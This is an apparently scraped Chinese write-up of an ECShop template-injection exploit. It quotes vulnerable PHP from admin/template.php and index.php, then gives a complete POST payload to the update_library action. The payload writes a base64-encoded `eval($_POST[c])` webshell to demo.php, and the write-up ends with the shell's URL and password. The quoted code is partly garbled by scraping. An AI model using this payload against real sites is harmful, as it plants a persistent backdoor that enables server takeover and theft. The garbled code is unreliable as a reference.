admin/template.php
if ($_REQUEST['act'] == ‘update_library’) { check_authz_json(‘library_manage’); $ html = stripslashes(json_str_iconv($_POST['html'])); $lib_file = ‘themes/’ . $_CFG['template'] . ‘/library/’ . $_POST['lib'] . ‘.lbi’; //模板文件 $lib_file = str_replace([0xa], ], $lib_file); // 过滤 0xa 非法字符 $org_html = str_replace([\xEF\xBB\xBF], ], file_get_contents($lib_file)); if (@file_exists($lib_file) === true && @file_put_contents($lib_file, $html))//写出 { @file_put_contents(‘temp/backup/library/’ . $_CFG['template'] . ‘-’ . $_POST['lib'] . ‘.lbi’, $org_html); make_json_result(], $_LANG['update_lib_success']); } else { make_json_error(sprintf($_LANG['update_lib_failed'], ‘themes/’ . $_CFG['template'] . ‘/library’)); } }
由于 `$_POST['lib']` 被直接拼进模板路径、`$html` 除 stripslashes 外未做任何校验就整体写入 .lbi 模板文件，只要找一个会渲染该模板的前台入口（例如 index.php），写入的内容就会作为模板代码被解释：
index.php
if ($act == ‘cat_rec’) { $rec_array = array(1 => ‘best’, 2 => ‘new’, 3 => ‘hot’); $rec_type = !empty($_REQUEST['rec_type']) ? intval($_REQUEST['rec_type']) : ’1′; $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : ’0′; include_once(‘includes/cls_json.php’); $json = new JSON; $result = array(‘error’ => 0, ‘content’ => ], ‘type’ => $rec_type, ‘cat_id’ => $cat_id);
$children = get_children($cat_id); $smarty->assign($rec_array[$rec_type] . ‘_goods’, get_category_recommend_goods($rec_array[$rec_type], $children)); // 推荐商品 $smarty->assign(‘cat_rec_sign’, 1); $result['content'] = $smarty->fetch(‘library/recommend_’ . $rec_array[$rec_type] . ‘.lbi’);//使用了模板文件 该模板文件为recommend_best echo ‘library/recommend_’ . $rec_array[$rec_type] . ‘.lbi’; echo $rec_array[$rec_type]; die($json->encode($result)); } 那么就有利用方法了 post包到http:// HdhCmsTest2cto测试数据 /ec/admin/template.php?act=update_library Post内容: lib=recommend_best&html={if fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if} 复制代码 然后访问http://localhost/ec/index.php?act=cat_rec shel地址:http://localhost/ec/demo.php 密码c